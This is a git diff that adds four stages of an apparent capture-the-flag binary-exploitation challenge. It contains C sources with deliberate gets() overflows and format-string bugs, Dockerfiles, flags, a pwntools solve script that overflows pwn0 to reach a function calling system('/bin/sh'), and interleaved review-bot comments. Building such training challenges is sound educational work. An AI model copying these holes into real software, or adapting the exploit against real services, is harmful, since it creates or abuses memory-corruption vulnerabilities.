diff --git a/pwn/pwn0/Dockerfile b/pwn/pwn0/Dockerfile
new file mode 100644
index 0000000000000000000000000000000000000000..6006950a961154670ef9034a03befedbdb9e72c6
--- /dev/null
+++ b/pwn/pwn0/Dockerfile
@@ -0,0 +1,19 @@
+# docker build -t pwn0 . && docker run -p 1024:1024 --rm -it pwn0
+
+FROM ubuntu:20.04
+
+RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
+RUN echo "ctf:ctf" | chpasswd
+
+WORKDIR /home/ctf
+
+COPY pwn0 .
+COPY flag .
+COPY ynetd .
+
+RUN chmod +x ynetd pwn0
+
+RUN chown -R root:root /home/ctf
+
+USER ctf
+CMD ./ynetd ./pwn0
\ No newline at end of file
diff --git a/pwn/pwn0/flag b/pwn/pwn0/flag
new file mode 100644
index 0000000000000000000000000000000000000000..31511c22f5c7164c39cf4c775212430d29a850ab
--- /dev/null
+++ b/pwn/pwn0/flag
@@ -0,0 +1 @@
+CSCG{NOW_PRACTICE_EVEN_MORE}
diff --git a/pwn/pwn0/pwn0 b/pwn/pwn0/pwn0
new file mode 100755
index 0000000000000000000000000000000000000000..9a47cb2697ec23414f014d150d06efa5dfb765a8
Binary files /dev/null and b/pwn/pwn0/pwn0 differ
diff --git a/pwn/pwn0/pwn0.c b/pwn/pwn0/pwn0.c
new file mode 100644
index 0000000000000000000000000000000000000000..fa0a9c1091a42e4a656a423772c1d27913534351
--- /dev/null
+++ b/pwn/pwn0/pwn0.c
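Review bot: `RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf` hands `-p` the literal string `ctf`, but `-p` expects an already-hashed password, and the very next line `RUN echo "ctf:ctf" | chpasswd` overwrites it anyway, so the `-p ctf` is dead and misleading; nothing visible in this Dockerfile (no sshd, no login service) uses a password at all, so both lines can presumably be dropped. `CMD ./ynetd ./pwn0` is the shell form, so `/bin/sh -c` may end up as PID 1 and a `docker stop` SIGTERM is not forwarded to ynetd; `CMD ["./ynetd", "./pwn0"]` keeps the service as PID 1. `FROM ubuntu:20.04` floats with the tag, so the libc the shipped `pwn0` runs against can change between builds; pinning the image by digest keeps a pwn challenge reproducible.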
@@ -0,0 +1,55 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+
+// pwn1: gcc pwn0.c -no-pie -o pwn0 -fno-stack-protector
+
+// --------------------------------------------------- SETUP
+
+void ignore_me_init_buffering() {
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void kill_on_timeout(int sig) {
+ if (sig == SIGALRM) {
+ printf("[!] Anti DoS Signal. Patch me out for testing.");
+ _exit(0);
+ }
+}
+
+void ignore_me_init_signal() {
+ signal(SIGALRM, kill_on_timeout);
+ alarm(60);
+}
+
+// --------------------------------------------------- MENU
+
+void WINgardium_leviosa() {
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Slytherin.. │\n");
+ printf("└───────────────────────┘\n");
+ system("/bin/sh");
+}
+
+void AAAAAAAA() {
+ char read_buf[0xff];
+
+ printf(" enter your magic spell:\n");
+ gets(read_buf);
+
+ printf("~ Protego!\n");
+}
+// --------------------------------------------------- MAIN
+
+void main(int argc, char* argv[]) {
+ ignore_me_init_buffering();
+ ignore_me_init_signal();
+
+ AAAAAAAA();
+}
+
+
diff --git a/pwn/pwn0/solve.py b/pwn/pwn0/solve.py
new file mode 100755
index 0000000000000000000000000000000000000000..23dc374b8790e884d4bcb03ff09e3ad71df157a3
--- /dev/null
+++ b/pwn/pwn0/solve.py
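Review bot: The build-line comment `// pwn1: gcc pwn0.c -no-pie -o pwn0 -fno-stack-protector` is labelled `pwn1` inside `pwn0.c`, while every sibling file carries its own name; make it `// pwn0: gcc pwn0.c -no-pie -o pwn0 -fno-stack-protector` so the label matches the file and the output it names. `kill_on_timeout` calls `printf` from a signal handler, which is not async-signal-safe even with `_IONBF` set: if SIGALRM fires while the main thread is inside another `printf` holding the stdout lock, the handler can deadlock and never reach `_exit(0)`, which is the opposite of what an anti-DoS timeout is for; `write(STDOUT_FILENO, msg, sizeof msg - 1);` before `_exit(0)` is the safe form. The `gets` call in `AAAAAAAA` is presumably the intended vulnerability for this stage and is left alone.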
@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template pwn0
+from pwn import *
+
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF(args.EXE or 'pwn0')
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args". For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+
+
+
+def start(argv=[], *a, **kw):
+ '''Start the exploit against the target.'''
+ if args.GDB:
+ return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
+ else:
+ return process([exe.path] + argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+tbreak main
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+# Arch: amd64-64-little
+# RELRO: Partial RELRO
+# Stack: No canary found
+# NX: NX enabled
+# PIE: No PIE (0x400000)
+
+io = start()
+
+
+io.recvuntil(b"enter your magic spell:")
+io.sendline(cyclic_find(b'qaac')*b'A' + p64(0x0000000000401380) + p64(exe.sym['WINgardium_leviosa']))
+
+
+io.interactive()
+
diff --git a/pwn/pwn0/ynetd b/pwn/pwn0/ynetd
new file mode 100644
index 0000000000000000000000000000000000000000..0b1b2b06920c5922696ce6dcec750fa6b7b7f54a
Binary files /dev/null and b/pwn/pwn0/ynetd differ
diff --git a/pwn/pwn1/Dockerfile b/pwn/pwn1/Dockerfile
new file mode 100644
index 0000000000000000000000000000000000000000..f5a285f9073069f8f879ecdd6783d61b8daf1914
--- /dev/null
+++ b/pwn/pwn1/Dockerfile
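Review bot: `p64(0x0000000000401380)` inside the `io.sendline` payload is an unexplained magic address; from the surrounding payload it is presumably a `ret` gadget inserted to realign the stack to 16 bytes before `WINgardium_leviosa` reaches `system`, but any rebuild of `pwn0` moves it and the exploit then fails silently. Resolve it from the binary instead, e.g. `ret_gadget = ROP(exe).find_gadget(['ret'])[0]` and `p64(ret_gadget)`, and record the alignment reason in a comment next to it. `start()` only ever spawns a local `process`, while the Dockerfile publishes port 1024; a `remote(args.HOST, int(args.PORT or 1024))` branch guarded by `if args.HOST:` would let the same script be run against the container.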
@@ -0,0 +1,25 @@
+# docker build -t pwn1 . && docker run -p 1024:1024 --rm -it pwn1
+
+FROM ubuntu:19.10
+
+# Using this repo, since the official is down (end EOL)
+RUN sed 's@archive.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+RUN sed 's@security.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+
+RUN apt-get update
+
+RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
+RUN echo "ctf:ctf" | chpasswd
+
+WORKDIR /home/ctf
+
+COPY pwn1 .
+COPY flag .
+COPY ynetd .
+
+RUN chmod +x ynetd pwn1
+
+RUN chown -R root:root /home/ctf
+
+USER ctf
+CMD ./ynetd ./pwn1
\ No newline at end of file
diff --git a/pwn/pwn1/flag b/pwn/pwn1/flag
new file mode 100644
index 0000000000000000000000000000000000000000..31511c22f5c7164c39cf4c775212430d29a850ab
--- /dev/null
+++ b/pwn/pwn1/flag
@@ -0,0 +1 @@
+CSCG{NOW_PRACTICE_EVEN_MORE}
diff --git a/pwn/pwn1/intro-pwn-1.zip b/pwn/pwn1/intro-pwn-1.zip
new file mode 100644
index 0000000000000000000000000000000000000000..873e7b124aa9de977cfc5279929c251f49e152d5
Binary files /dev/null and b/pwn/pwn1/intro-pwn-1.zip differ
diff --git a/pwn/pwn1/pwn1 b/pwn/pwn1/pwn1
new file mode 100644
index 0000000000000000000000000000000000000000..4b824c7042945dd216c3dd6a9115fbf1e5a84d89
Binary files /dev/null and b/pwn/pwn1/pwn1 differ
diff --git a/pwn/pwn1/pwn1.c b/pwn/pwn1/pwn1.c
new file mode 100644
index 0000000000000000000000000000000000000000..bad739f243451b0c5c0676becf0c6f9e6df84ddb
--- /dev/null
+++ b/pwn/pwn1/pwn1.c
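Review bot: `RUN apt-get update` is not followed by any `apt-get install`, so it only writes the package index of an end-of-life release into its own layer and makes the build depend on `mirror.fairway.ne.jp` being up for nothing in return; either drop the line or fold it into the `RUN` that installs whatever it was meant to precede. The two `sed` lines repoint apt at an unofficial mirror over plain HTTP; apt's signature check still protects package contents, but an unofficial mirror of an EOL release can serve stale or missing indexes, so pinning `FROM ubuntu:19.10` by digest is the more reliable way to fix the libc this stage runs on. `CMD ./ynetd ./pwn1` is the shell form, so stop signals go to `sh` rather than ynetd; `CMD ["./ynetd", "./pwn1"]` avoids that.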
@@ -0,0 +1,70 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+
+// pwn1: gcc pwn1.c -o pwn1 -fno-stack-protector
+
+// --------------------------------------------------- SETUP
+
+void ignore_me_init_buffering() {
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void kill_on_timeout(int sig) {
+ if (sig == SIGALRM) {
+ printf("[!] Anti DoS Signal. Patch me out for testing.");
+ _exit(0);
+ }
+}
+
+void ignore_me_init_signal() {
+ signal(SIGALRM, kill_on_timeout);
+ alarm(60);
+}
+
+// --------------------------------------------------- MENU
+
+void WINgardium_leviosa() {
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Slytherin.. │\n");
+ printf("└───────────────────────┘\n");
+ system("/bin/sh");
+}
+
+void welcome() {
+ char read_buf[0xff];
+ printf("Enter your witch name:\n");
+ gets(read_buf);
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Hufflepuff! │\n");
+ printf("└───────────────────────┘\n");
+ printf(read_buf);
+}
+
+void AAAAAAAA() {
+ char read_buf[0xff];
+
+ printf(" enter your magic spell:\n");
+ gets(read_buf);
+ if(strcmp(read_buf, "Expelliarmus") == 0) {
+ printf("~ Protego!\n");
+ } else {
+ printf("-10 Points for Hufflepuff!\n");
+ _exit(0);
+ }
+}
+// --------------------------------------------------- MAIN
+
+void main(int argc, char* argv[]) {
+ ignore_me_init_buffering();
+ ignore_me_init_signal();
+
+ welcome();
+ AAAAAAAA();
+}
+
+
diff --git a/pwn/pwn1/ynetd b/pwn/pwn1/ynetd
new file mode 100644
index 0000000000000000000000000000000000000000..0b1b2b06920c5922696ce6dcec750fa6b7b7f54a
Binary files /dev/null and b/pwn/pwn1/ynetd differ
diff --git a/pwn/pwn2/Dockerfile b/pwn/pwn2/Dockerfile
new file mode 100644
index 0000000000000000000000000000000000000000..61987932119f88ec3b439aef324dbdd5ae06cc92
--- /dev/null
+++ b/pwn/pwn2/Dockerfile
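Review bot: `ignore_me_init_buffering`, `kill_on_timeout`, `ignore_me_init_signal` and `WINgardium_leviosa` are verbatim copies of the same functions in pwn0.c, and the same block recurs in the later stages of this diff; a shared header (e.g. `common.h` included by each stage) would keep the four binaries in step when one of them is corrected, and the per-stage files would shrink to the parts that actually differ. `void main(int argc, char* argv[])` is not a standard signature and neither parameter is used; `int main(void)` with a `return 0;` costs nothing and keeps `-Wall` quiet. The `gets` calls and the `printf(read_buf)` in `welcome` are presumably the intended bugs for this stage and are left alone.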
@@ -0,0 +1,24 @@
+# docker build -t pwn2 . && docker run -p 1024:1024 --rm -it pwn2
+
+FROM ubuntu:19.10
+
+# Using this repo, since the official is down (end EOL)
+RUN sed 's@archive.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+RUN sed 's@security.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+
+RUN apt-get update
+
+RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
+RUN echo "ctf:ctf" | chpasswd
+
+WORKDIR /home/ctf
+
+COPY pwn2 .
+COPY flag .
+COPY ynetd .
+
+RUN chmod +x ynetd pwn2
+RUN chown -R root:root /home/ctf
+
+USER ctf
+CMD ./ynetd ./pwn2
\ No newline at end of file
diff --git a/pwn/pwn2/flag b/pwn/pwn2/flag
new file mode 100644
index 0000000000000000000000000000000000000000..b9414bc15466b311f89a516b0671c4b5c255440a
--- /dev/null
+++ b/pwn/pwn2/flag
@@ -0,0 +1 @@
+CSCG{THIS_IS_TEST_FLAG}
\ No newline at end of file
diff --git a/pwn/pwn2/pwn2 b/pwn/pwn2/pwn2
new file mode 100644
index 0000000000000000000000000000000000000000..29dc00b6b6a8df26435c2758797eeec3470d02fc
Binary files /dev/null and b/pwn/pwn2/pwn2 differ
diff --git a/pwn/pwn2/pwn2.c b/pwn/pwn2/pwn2.c
new file mode 100644
index 0000000000000000000000000000000000000000..b70a501f9d7f0ad8127811ca9ae25f75d006e7f3
--- /dev/null
+++ b/pwn/pwn2/pwn2.c
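Review bot: `COPY pwn2 .` ships a prebuilt binary rather than compiling `pwn2.c` in the image, so the stage-1 password compiled into it (the `-DPASSWORD=...` value, or the `CSCG{FLAG_FROM_STAGE_1}` placeholder if that flag was omitted) cannot be audited from this repository, and the `flag` added here is only a test placeholder. Building inside the Dockerfile, e.g. `ARG STAGE1_FLAG` followed by `RUN gcc pwn2.c -o pwn2 -DPASSWORD="\"$STAGE1_FLAG\""` with `gcc` installed in the layer that currently only runs `apt-get update`, would make the password chain between stages reproducible at deploy time. `CMD ./ynetd ./pwn2` is the shell form, so stop signals reach `sh` rather than ynetd; `CMD ["./ynetd", "./pwn2"]` fixes that.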
@@ -0,0 +1,106 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+
+#ifndef PASSWORD
+ #define PASSWORD "CSCG{FLAG_FROM_STAGE_1}"
+#endif
+
+// pwn2: gcc pwn2.c -o pwn2
+
+// --------------------------------------------------- SETUP
+
+void ignore_me_init_buffering() {
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void kill_on_timeout(int sig) {
+ if (sig == SIGALRM) {
+ printf("[!] Anti DoS Signal. Patch me out for testing.");
+ _exit(0);
+ }
+}
+
+void ignore_me_init_signal() {
+ signal(SIGALRM, kill_on_timeout);
+ alarm(60);
+}
+
+// just a safe alternative to gets()
+size_t read_input(int fd, char *buf, size_t size) {
+ size_t i;
+ for (i = 0; i < size-1; ++i) {
+ char c;
+ if (read(fd, &c, 1) <= 0) {
+ _exit(0);
+ }
+ if (c == '\n') {
+ break;
+ }
+ buf[i] = c;
+ }
+ buf[i] = '\0';
+ return i;
+}
+
+// --------------------------------------------------- MENU
+
+void WINgardium_leviosa() {
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Slytherin.. │\n");
+ printf("└───────────────────────┘\n");
+ system("/bin/sh");
+}
+
+void check_password_stage1() {
+ char read_buf[0xff];
+ printf("Enter the password of stage 1:\n");
+ memset(read_buf, 0, sizeof(read_buf));
+ read_input(0, read_buf, sizeof(read_buf));
+ if(strcmp(read_buf, PASSWORD) != 0) {
+ printf("-10 Points for Ravenclaw!\n");
+ _exit(0);
+ } else {
+ printf("+10 Points for Ravenclaw!\n");
+ }
+}
+
+void welcome() {
+ char read_buf[0xff];
+ printf("Enter your witch name:\n");
+ gets(read_buf);
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Ravenclaw! 
│\n");
+ printf("└───────────────────────┘\n");
+ printf(read_buf);
+}
+
+
+void AAAAAAAA() {
+ char read_buf[0xff];
+ printf(" enter your magic spell:\n");
+ gets(read_buf);
+ if(strcmp(read_buf, "Expelliarmus") == 0) {
+ printf("~ Protego!\n");
+ } else {
+ printf("-10 Points for Ravenclaw!\n");
+ _exit(0);
+ }
+}
+// --------------------------------------------------- MAIN
+
+void main(int argc, char* argv[]) {
+ ignore_me_init_buffering();
+ ignore_me_init_signal();
+
+ check_password_stage1();
+
+ welcome();
+ AAAAAAAA();
+}
+
+
diff --git a/pwn/pwn2/ynetd b/pwn/pwn2/ynetd
new file mode 100644
index 0000000000000000000000000000000000000000..0b1b2b06920c5922696ce6dcec750fa6b7b7f54a
Binary files /dev/null and b/pwn/pwn2/ynetd differ
diff --git a/pwn/pwn3/Dockerfile b/pwn/pwn3/Dockerfile
new file mode 100644
index 0000000000000000000000000000000000000000..316d1b048e44fa93c93df594849ace1c2189df53
--- /dev/null
+++ b/pwn/pwn3/Dockerfile
@@ -0,0 +1,24 @@
+# docker build -t pwn3 . && docker run -p 1024:1024 --rm -it pwn3
+
+FROM ubuntu:19.10
+
+# Using this repo, since the official is down (end EOL)
+RUN sed 's@archive.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+RUN sed 's@security.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+
+RUN apt-get update
+
+RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
+RUN echo "ctf:ctf" | chpasswd
+
+WORKDIR /home/ctf
+
+COPY pwn3 .
+COPY flag .
+COPY ynetd .
+
+RUN chmod +x ynetd pwn3
+RUN chown -R root:root /home/ctf
+
+USER ctf
+CMD ./ynetd ./pwn3
\ No newline at end of file
diff --git a/pwn/pwn3/flag b/pwn/pwn3/flag
new file mode 100644
index 0000000000000000000000000000000000000000..b9414bc15466b311f89a516b0671c4b5c255440a
--- /dev/null
+++ b/pwn/pwn3/flag
@@ -0,0 +1 @@
+CSCG{THIS_IS_TEST_FLAG}
\ No newline at end of file
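Review bot: The `#ifndef PASSWORD` / `#define PASSWORD "CSCG{FLAG_FROM_STAGE_1}"` fallback means a build that forgets `-DPASSWORD=...` silently accepts the placeholder as the stage-1 password, and the documented build line `// pwn2: gcc pwn2.c -o pwn2` does not pass it; replacing the fallback with `#error "build with -DPASSWORD=\"<stage-1 flag>\""` turns that mistake into a build failure instead of a bypass. `read_input` evaluates `size-1` on a `size_t`, which wraps to `SIZE_MAX` for `size == 0` and then writes through `buf` unbounded; the only caller passes `sizeof(read_buf)`, but a one-line `if (size == 0) return 0;` at the top makes the helper live up to its "safe alternative to gets()" comment for any caller. The `gets` calls and `printf(read_buf)` in `welcome` are presumably the intended bugs for this stage and are left alone.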
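Review bot: This commit adds `pwn/pwn3/libc.so.6` beside the Dockerfile, but the image never `COPY`s or verifies it, so the libc solvers are presumably meant to compute offsets against is whatever `ubuntu:19.10` pulled from `mirror.fairway.ne.jp` happens to ship at build time, and the two can drift apart. Pin the relationship at build time, e.g. `COPY libc.so.6 /tmp/libc.so.6` followed by `RUN cmp /tmp/libc.so.6 /lib/x86_64-linux-gnu/libc.so.6 && rm /tmp/libc.so.6`, so a mismatch fails the build rather than the challenge. `CMD ./ynetd ./pwn3` is the shell form, so stop signals reach `sh` rather than ynetd; `CMD ["./ynetd", "./pwn3"]` fixes that.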
diff --git a/pwn/pwn3/libc.so.6 b/pwn/pwn3/libc.so.6
new file mode 100644
index 0000000000000000000000000000000000000000..148b002c2d2d6bace6c72d10d93c6439d87afd26
Binary files /dev/null and b/pwn/pwn3/libc.so.6 differ
diff --git a/pwn/pwn3/pwn3 b/pwn/pwn3/pwn3
new file mode 100755
index 0000000000000000000000000000000000000000..ee79bb8f31c83ec090d7cc77d8418be0abc02e49
Binary files /dev/null and b/pwn/pwn3/pwn3 differ
diff --git a/pwn/pwn3/pwn3.c b/pwn/pwn3/pwn3.c
new file mode 100644
index 0000000000000000000000000000000000000000..5ca05019368e5bdcbfcf0f60b90f6e02a17d714e
--- /dev/null
+++ b/pwn/pwn3/pwn3.c
@@ -0,0 +1,105 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+
+#ifndef PASSWORD
+ #define PASSWORD "CSCG{XXXXXXXXXXXXXXXXXXXX}"
+#endif
+
+// pwn3: gcc pwn3.c -o pwn3
+
+// --------------------------------------------------- SETUP
+
+void ignore_me_init_buffering() {
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void kill_on_timeout(int sig) {
+ if (sig == SIGALRM) {
+ printf("[!] Anti DoS Signal. Patch me out for testing.");
+ _exit(0);
+ }
+}
+
+void ignore_me_init_signal() {
+ signal(SIGALRM, kill_on_timeout);
+ alarm(60);
+}
+
+// just a safe alternative to gets()
+size_t read_input(int fd, char *buf, size_t size) {
+ size_t i;
+ for (i = 0; i < size-1; ++i) {
+ char c;
+ if (read(fd, &c, 1) <= 0) {
+ _exit(0);
+ }
+ if (c == '\n') {
+ break;
+ }
+ buf[i] = c;
+ }
+ buf[i] = '\0';
+ return i;
+}
+
+// --------------------------------------------------- MENU
+
+void WINgardium_leviosa() {
+ printf("They has discovered our secret, Nagini.\n");
+ printf("It makes us vulnerable.\n");
+ printf("We must deploy all our forces now to find them.\n");
+ // system("/bin/sh") it's not that easy anymore.
+}
+
+void check_password_stage2() {
+ char read_buf[0xff];
+ printf("Enter the password of stage 2:\n");
+ memset(read_buf, 0, sizeof(read_buf));
+ read_input(0, read_buf, sizeof(read_buf));
+ if(strcmp(read_buf, PASSWORD) != 0) {
+ printf("-10 Points for Gryffindor!\n");
+ _exit(0);
+ } else {
+ printf("+10 Points for Gryffindor!");
+ }
+}
+
+void welcome() {
+ char read_buf[0xff];
+ printf("Enter your witch name:\n");
+ gets(read_buf);
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Gryffindor! 
│\n");
+ printf("└───────────────────────┘\n");
+ printf(read_buf);
+}
+
+void AAAAAAAA() {
+ char read_buf[0xff];
+
+ printf(" enter your magic spell:\n");
+ gets(read_buf);
+ if(strcmp(read_buf, "Expelliarmus") == 0) {
+ printf("~ Protego!\n");
+ } else {
+ printf("-10 Points for Gryffindor!\n");
+ _exit(0);
+ }
+}
+
+// --------------------------------------------------- MAIN
+
+void main(int argc, char* argv[]) {
+ ignore_me_init_buffering();
+ ignore_me_init_signal();
+
+ check_password_stage2();
+
+ welcome();
+ AAAAAAAA();
+}
diff --git a/pwn/pwn3/ynetd b/pwn/pwn3/ynetd
new file mode 100644
index 0000000000000000000000000000000000000000..0b1b2b06920c5922696ce6dcec750fa6b7b7f54a
Binary files /dev/null and b/pwn/pwn3/ynetd differ
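Review bot: In `check_password_stage2` the success branch `printf("+10 Points for Gryffindor!");` has no trailing newline, unlike its own failure branch and the matching message in the stage-2 file, so the next prompt `Enter your witch name:` is printed on the same output line; make it `printf("+10 Points for Gryffindor!\n");`. The `#define PASSWORD "CSCG{XXXXXXXXXXXXXXXXXXXX}"` fallback has the same weakness as a default: a build that omits `-DPASSWORD` (the documented `// pwn3: gcc pwn3.c -o pwn3` does) accepts the placeholder as the stage-2 password, and an `#error` in the `#ifndef PASSWORD` branch is the safer choice. `WINgardium_leviosa` is no longer referenced now that its `system("/bin/sh")` is commented out, yet it is still compiled in; if it is meant to stay in the binary on purpose, a comment such as `// intentionally kept in the binary` would keep a later cleanup from removing it.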